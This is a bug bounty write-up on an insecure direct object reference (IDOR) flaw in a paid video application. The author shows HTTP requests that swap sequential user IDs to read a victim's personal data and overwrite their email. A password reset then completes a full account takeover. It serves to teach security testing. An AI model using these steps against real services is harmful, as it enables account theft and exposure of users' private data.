IDOR : A Tale of Account Takeover
Hi Fellow Hackers & Security Enthusiasts, I’m back again with a new Bugbounty Writeup. Today I am going to write How I was able to get Free Subscription of Premium Videos on an Application by Account Takeover. The application was vulnerable with Insecure direct object references (IDOR) through which I could perform several attacks. On further digging the endpoints, I was able to perform a Full Account Takeover by User’s Profile Information i.e. Email, Password, Mobile Numbers, etc. Before starting with the attack scenario, let’s see some basics about IDOR.
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
So, let’s call the target as target.com. I started with testing the User Authentication process as I like to do Authentication Bypass on an application. But unluckily, I couldn’t get success here. As the application has paid subscription, I created a free account which was later asking to Purchase Subscription for accessing the Content. After roaming across with the application, I came to the User Profile section which has the request like this:
GET /user/152453 HTTP/1.1
Host: target.com
Cookies: session=xxxxxxxxSent this request to the Repeater and replace with the Victim’s UserID (152157) which was easily guessable due sequential UserID. The response I got back from the application was such a gem:
HTTP/1.1 200 OK
{“user”:“id”:152157,”email”:”victim@test.com”,”name”:”Victim”,
”membership”:1,”created_at”:”2020–02–17 18:45:01”, ”updated_at”:”2020–02–17 18:45:01", ”status”:1, ”device_id”:null, ”mob_id”:null,”phone”:”1234567890",”dob”:”1998-10–14”,”access”:1}I was able to get any user’s account information. But the fight has not completed yet. I need User’s Password to access those accounts. On updating the User Profile, I found /updateuserprofile endpoint which has the request like this:
POST /updateuserprofile/152453 HTTP/1.1
Host: target.com
Cookies: session=xxxxxxxx{“name”:”Attacker”,”email”:”attacker@test.com”,”phone”:”1234567890",”dob”:”2000–01–01"}
Quickly sent the request to Repeater and replaced the Attacker’s UserID i.e.152453 with Victim’s ID i.e.152157 and got the result what I wanted:
HTTP/1.1 200 OK{“status”:”User Data Successfully Updated”,“user”:“id”:152157, ”email”:”attacker@test.com”,”name”:”Attacker”,”membership”:1
”created_at”:”2020–02–17 18:45:01",”updated_at”:”2020–06–28 15:22:49",”status”:1,”device_id”:null,”mob_id”:null,”phone”:”1234567890",”dob”:”2000–01–01",”access”:1}
I successfully updated Victim’s Email address and further details with Attacker’s. Then I logged out and Requested a New Password on Attacker’s Email and YESS!!!.. I Successfully Logged in to the Paid Account and also able to access all the paid content. So here’s my way to Account Takeover of any user on a target application. I also found some other ways to get Paid Membership for user but this one was more interesting and easy.
Takeaways:
- Mapping the application always plays a big role in crawling endpoints.
- Always try to increase the impact of the vulnerability.
- Explanation and Practice Lab for IDOR : PortSwigger
If you enjoyed reading my article do clap and follow on Medium and Twitter:
Twitter: https://twitter.com/_p4nk4j
LinkedIn: https://www.linkedin.com/in/p4nk4jv/
